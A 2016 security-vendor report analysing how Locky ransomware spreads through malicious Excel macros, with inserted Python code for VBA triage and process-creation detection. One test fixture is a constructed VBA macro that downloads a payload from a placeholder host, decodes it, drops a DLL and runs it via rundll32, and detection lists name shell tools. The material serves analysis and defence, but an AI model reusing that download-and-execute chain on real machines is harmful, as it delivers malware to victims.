
THE RANSOMWARE RISKS IN OFFICE FILES

Published: 03.10.2016


Sinara Labs | www.sinaralabs.com | @Sinaralabs

CONTENTS

● Ransomware
● Why Macros?
● Inadequacy of Cyber Security Technology
● An Example of a Malicious Software Analysis
● General Solutions
  o Individual Solution Offers
  o Institutional Solution Offers


Ransomware

Ransomware has been a nightmare for individuals and institutions for the last two years; the current wave was first seen in September 2013. It is a dangerous kind of trojan horse in the ransom category. Initially limited to Microsoft Windows, ransomware has since also been implemented for Android devices and Mac computers.

Ransomware is typically delivered as an e-mail attachment. Once run, it encrypts certain file types on the local disks and on network shares, and the user is then told that the encrypted files will not be decrypted unless a ransom is paid. In other words, it carries out a cryptovirology attack that makes the files unusable and demands a payment to restore them. Some variants also threaten that the files will never be decrypted/restored if the ransom is not paid within the given time.

In Turkey, ransomware is most commonly spread through e-mails containing fake electronic invoices. However, it should be kept in mind that attackers keep developing new infection methods. In recent weeks we have seen macros in Office files used as a new way of infection.

Note: The ransomware survey prepared specifically for Turkey can be reached here.

Why Macros?

Office files are used in the business world, by accountants and data-processing staff in particular, to formulate and automate frequently repeated tasks. Because macros make it possible to run code and instructions from inside a document, attackers typically abuse this capability. Malicious code (harmful macros) embedded in Excel, Word and similar files can be used to install malware that encrypts data and then demands a ransom for its return.


Inadequacy of Cyber Security Technology

The commonly used antivirus and sandbox solutions largely get nowhere against new-generation ransomware. The main reason is that new-generation ransomware can constantly change its digital signature, so it cannot be recognised by signature-based and static analysis. Malware developers and attackers can also circumvent heuristic and behaviour-based automated analysis mechanisms with methods of their own. In some cases, we see that these technologies are late in discovering new malicious software.


An example of Ransomware

In the following example we share the analysis of an e-mail received in our own mailbox. You can receive an e-mail with a subject you never expected, or from a person you never expected, and still believe it concerns you. Such a malicious e-mail may appear (by imitation) to come from an acquaintance or from a source you were expecting mail from. We begin the analysis with this e-mail trick, as a reminder that it is possible to send an e-mail on someone else's behalf: the sender address can be forged.

Picture - A "Sample e-mail with a malicious Excel file attached"

An Example of a Malicious Software Analysis

In general, the malware known as Locky ransomware is sent to the victim by e-mail, as can be seen in Picture A. When the victim downloads the Excel file from the e-mail and opens it, the macro in the Excel file becomes active and the malware starts running through that macro.

In this example it draws our attention that, to make the file name convincing, a corporate name was chosen for the file. As in the previous ransomware "invoice" examples we have seen, the invoice names are carefully selected to enhance credibility.

Picture - 1 "To make the file name convincing, it uses templates common in corporate environments."

When we analyze the macro in Picture 2, the first thing it does is download the encrypted payload to the computer from a server on the Internet.


Picture - 2 "Download address of the malicious code fragments"

Because of what macros can do, Office files in Excel or Word format have long since become one of the most effective vehicles of abuse in cyber-attacks. When we examine the macro in the malicious Excel file, what stands out is that encrypted content is downloaded from the Internet, decrypted and then run.

The malware author did not use code obfuscation in this case. As you can see in Picture 2, this part of the code downloads the malware stage that encrypts your data from nutrahacks.com and then runs it. In other words, the author writes a malicious macro that downloads a piece of code which encrypts the files on the victim's computer, decrypts it and runs it.
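As an added example (not part of the Sinara Labs report), the following Python script does the static part of this triage offline: it decompresses a VBA module stream in the MS-OVBA format that vbaProject.bin stores modules in, then flags the download, decode, drop-path and execute indicators of the chain described above. The VBA source is constructed for the example and uses a placeholder hostname rather than the domain in the report; the literal-only encoder is included only to build the compressed test input, since pulling the stream out of the OLE2 container is left to an OLE parser.

```python
"""Static triage of a VBA module like the Locky Excel macro: decompress the
MS-OVBA stream a module is stored in and flag download/decode/drop/execute code.
Added example, not Sinara Labs code; the VBA below is constructed and the hostname
is a placeholder."""
import re

def _copy_token_bit_count(position: int) -> int:
    # MS-OVBA CopyToken help: smallest n with 2**n >= offset in chunk, at least 4
    n = 4
    while (1 << n) < position:
        n += 1
    return n

def decompress_vba(data: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer into the raw module source."""
    if not data or data[0] != 0x01:
        raise ValueError("missing CompressedContainer signature 0x01")
    out, pos = bytearray(), 1
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        chunk_end = pos + (header & 0x0FFF) + 3     # stored size is chunk length - 3
        pos, chunk_start = pos + 2, len(out)
        if not header & 0x8000:                     # flag clear: 4096 raw bytes
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags, pos = data[pos], pos + 1         # one flag bit per following token
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:          # LiteralToken: copy one byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = int.from_bytes(data[pos:pos + 2], "little")  # CopyToken
                pos += 2
                bits = _copy_token_bit_count(len(out) - chunk_start)
                length = (token & (0xFFFF >> bits)) + 3
                offset = (token >> (16 - bits)) + 1
                for _ in range(length):             # byte-wise so overlaps work
                    out.append(out[-offset])
    return bytes(out)

def compress_literal_only(src: bytes) -> bytes:
    """Valid container built from literal tokens only (full chunks stored raw);
    used here just to build test input without an OLE file."""
    out = bytearray([0x01])
    for i in range(0, len(src), 4096):
        plain = src[i:i + 4096]
        if len(plain) == 4096:                      # literals never shrink: store raw
            out += (4095 | 0x3000).to_bytes(2, "little") + plain
            continue
        body = bytearray()
        for j in range(0, len(plain), 8):
            body += b"\x00" + plain[j:j + 8]        # flag 0x00: next 8 are literals
        out += ((len(body) - 1) | 0xB000).to_bytes(2, "little") + body
    return bytes(out)

INDICATORS = {
    "auto-exec": re.compile(r"\b(Auto_?Open|Workbook_Open|Document_Open|AutoExec)\b", re.I),
    "download": re.compile(r"URLDownloadToFile|MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "url": re.compile(r'https?://[^\s"\']+', re.I),
    "decode": re.compile(r"\bXor\b|StrReverse|Base64|Chr\s*\(", re.I),
    "drop-path": re.compile(r'Environ\s*\(\s*"(USERPROFILE|TEMP|APPDATA)"\s*\)', re.I),
    "execute": re.compile(r"\bShell\b|WScript\.Shell|rundll32(\.exe)?", re.I),
}

def scan_vba(source: str) -> dict:
    """Return {indicator class: sorted unique matches} for every class that fires."""
    hits = {}
    for name, rx in INDICATORS.items():
        found = sorted({m.group(0) for m in rx.finditer(source)})
        if found:
            hits[name] = found
    return hits

def triage_stream(compressed: bytes) -> dict:
    return scan_vba(decompress_vba(compressed).decode("latin-1"))

def is_download_and_execute(hits: dict) -> bool:
    """The Locky pattern: fetch something from the Internet, then run it."""
    return {"download", "execute"} <= set(hits)

# Constructed module mirroring the report's chain (hostname is a placeholder).
SAMPLE_VBA = b"""Sub Auto_Open()
    Dim h As Object, s As Object, p As String
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/files/payload.bin", False
    h.Send
    p = Environ("USERPROFILE") & "\\temp\\siluans.dll"
    Set s = CreateObject("ADODB.Stream")
    s.Type = 1: s.Open: s.Write Decode(h.responseBody): s.SaveToFile p, 2
    Shell "rundll32.exe " & p & ",qwerty", vbHide
End Sub

Function Decode(b() As Byte) As Byte()
    Dim i As Long: For i = 0 To UBound(b): b(i) = b(i) Xor 66: Next: Decode = b
End Function
"""
# Hand-built vector: literals a,b,c then one CopyToken (offset 3, length 6).
COPY_TOKEN_SAMPLE = bytes.fromhex("01 05b0 08 616263 0320")
```

The indicator classes are deliberately coarse: a single hit (say, a URL) is not a verdict, but a module that both fetches from the Internet and executes what it fetched is the chain this report describes and is worth blocking before any sandbox run.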


Picture - 3 "The Locky macro first downloads the piece of code in encrypted form."

The downloaded content is decoded into a DLL file and written as siluans.dll to the %USERPROFILE%\temp folder. This is a standard method used by ransomware, and the encryption process is started with the injection method shown in Pictures 4 and 5.

Picture - 4 "Injection method"


Picture - 5 "DLL injection method"

In Picture 6 we see the malicious macro code contained in the Excel file move into the next phase. The DLL that Locky ransomware needs is invoked with the help of the macro: rundll32.exe is used to call the DLL's qwerty export function.

Picture - 6 "Rundll32.exe qwerty function"

When we analyze the siluans.dll file, its command-and-control server, used to obtain the encryption keys, and the file I/O activity performed during the encryption process can be seen in Pictures 7, 8 and 9.
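As an added example (not from the report), here is detection logic for the behaviour shown in Pictures 4 to 6: an Office application spawning rundll32.exe, and rundll32.exe loading a DLL from a user-writable path such as %USERPROFILE%\temp and calling an arbitrary export. The events are constructed, JSON-per-line Sysmon-style process-creation records; the user names, paths and Office version directory are invented.

```python
"""Detection for the chain in Pictures 4-6: an Office application spawning
rundll32.exe, and rundll32.exe loading a DLL from a user-writable path and
calling an arbitrary export ("rundll32.exe <dll>,qwerty" in the report).
Added example, not Sinara Labs code.  The events are constructed JSON-per-line
Sysmon-style process-creation records; users, paths and versions are invented."""
import json
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# children a document being opened has no business starting
SUSPECT_CHILDREN = {"rundll32.exe", "regsvr32.exe", "cmd.exe", "powershell.exe",
                    "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe"}
# locations a standard user can write to: where a dropped DLL will live
USER_WRITABLE = re.compile(r"(^|\\)users\\[^\\]+\\|\\programdata\\|%(temp|tmp|appdata|userprofile)%", re.I)
# rundll32.exe [path\]name.dll,EntryPoint [args]; either path may be quoted
_RUNDLL = re.compile(r'^\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>\S+)', re.I)

def parse_rundll32(cmdline: str):
    """Split a rundll32 command line into (dll, export), or None if it has no such pair."""
    m = _RUNDLL.match(cmdline)
    return (m.group("dll"), m.group("export")) if m else None

def analyze_event(ev: dict) -> list:
    """Return the reasons a process-creation event is suspicious (empty if none)."""
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    image = ntpath.basename(ev.get("Image", "")).lower()
    reasons = []
    if parent in OFFICE_APPS and image in SUSPECT_CHILDREN:
        reasons.append(f"{parent} spawned {image}")
    if image == "rundll32.exe":
        parsed = parse_rundll32(ev.get("CommandLine", ""))
        if parsed and USER_WRITABLE.search(parsed[0]):
            reasons.append(f"rundll32 loading {parsed[0]} (user-writable path), export {parsed[1]}")
    return reasons

def load_events(lines) -> list:
    return [json.loads(l) for l in lines if l.strip()]

def hunt(lines) -> list:
    """Run analyze_event over JSON-per-line records; return [(record index, reasons)]."""
    alerts = []
    for i, ev in enumerate(load_events(lines)):
        reasons = analyze_event(ev)
        if reasons:
            alerts.append((i, reasons))
    return alerts

# Constructed records (not real telemetry).  Record 0 is the report's chain.
SAMPLE_EVENTS = r'''
{"UtcTime": "2016-10-03 09:14:22", "User": "CORP\\ayse", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe C:\\Users\\ayse\\temp\\siluans.dll,qwerty"}
{"UtcTime": "2016-10-03 09:14:25", "User": "CORP\\ayse", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "\"C:\\Windows\\System32\\rundll32.exe\" C:\\Windows\\System32\\shell32.dll,Control_RunDLL"}
{"UtcTime": "2016-10-03 09:15:01", "User": "CORP\\ayse", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"UtcTime": "2016-10-03 09:16:40", "User": "CORP\\mehmet", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c start %APPDATA%\\update.cmd"}
'''.strip().splitlines()

if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(f"ALERT record {idx}: " + "; ".join(why))
```

The two rules are independent on purpose: the first fires on the parent/child relationship regardless of arguments, the second on the DLL location regardless of parent, so the benign explorer.exe → rundll32.exe shell32.dll record stays quiet while the report's chain trips both.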


Picture - 7 "Key access"

Picture - 8 "Encrypted files are written back to disk with a unique sequence number and the .odin extension"


We see that the malware author, by using this unique sequence number (which also makes a per-file charge option possible), improves the restore functions.

Picture - 9 "A plain-text channel is used for the encryption key"

In Picture 9 we see that a plain-text channel is used for the encryption key. In short, the author evidently did not consider an additional layer of protection for the encryption key necessary.


Picture - 10 "The standard welcome screen shown after the encryption process"

In Picture 10 the welcome screen that appears after the encryption process has been completed is seen. We have determined how the ransomware acts through the macro in the Excel file, how the piece of code required for encryption is fetched from a server on the Internet, how the master key is sent to the server, how a message is delivered to the victim once encryption is complete and, as always, how a ransom is demanded.


Picture - 11 "Our encrypted files can only be recovered via a channel reached through the Tor Browser path."

As can be seen in the content of the message, the attacker lists the ransom payment procedures, which are carried out over the Tor network, in order to decrypt the files.


Solution proposals

In short, as a result of this ransomware analysis, we offer both individual and institutional solutions for your attention.

Individual solutions

● Tighten your anti-spam and antivirus protection, taking into account that these attacks are mainly carried out via e-mail or similar channels.
● Use a heuristic-based logger on your personal computer.
● Disable macros in Office files whose source you do not trust.
● Do not open attachments from people you do not know!
● Take the same approach to suspicious e-mails with invoice or cargo/shipping subjects.

Institutional solutions

● Tighten your anti-spam gateway solution and apply it against known ransomware threats.
● Measure your employees against these phishing attacks with similar tests, then give training to the specific individuals and groups that need it.
● Ransomware domain intelligence is a sound way to reduce the risk; take advantage of such services without hesitation.


About Sinara Labs

Sinara Labs is a security solution that continually develops itself against the new generation of phishing attacks, tests security products and raises the information security awareness of corporate employees.

To measure the knowledge level of your employees, Sinara Labs contains more than a hundred scenarios. Against cybercriminals who want to seize the sensitive data and user privileges of institutions, Sinara Labs tests the defence systems and creates specific reports for IT managers, providing significant success against targeted attacks.

With Sinara Labs, phishing tests can be performed on your corporate employees using dozens of unrelated scenarios, and a separate campaign can be run for each department. Every phishing test result is reported in detail, allowing you to take action on your weaknesses.

Thanks to Sinara Labs you can run simulation tests with realistic scenarios such as identity theft, theft of personal security data and access to the high-risk critical systems where sensitive data is located, and create awareness against such attacks.

Sinara Labs was developed as a domestic (national) software product in 2014 and is used in critical sectors such as finance, energy and telecom and in the most important institutions of our country.

For more information you can contact us by e-mail at [email protected].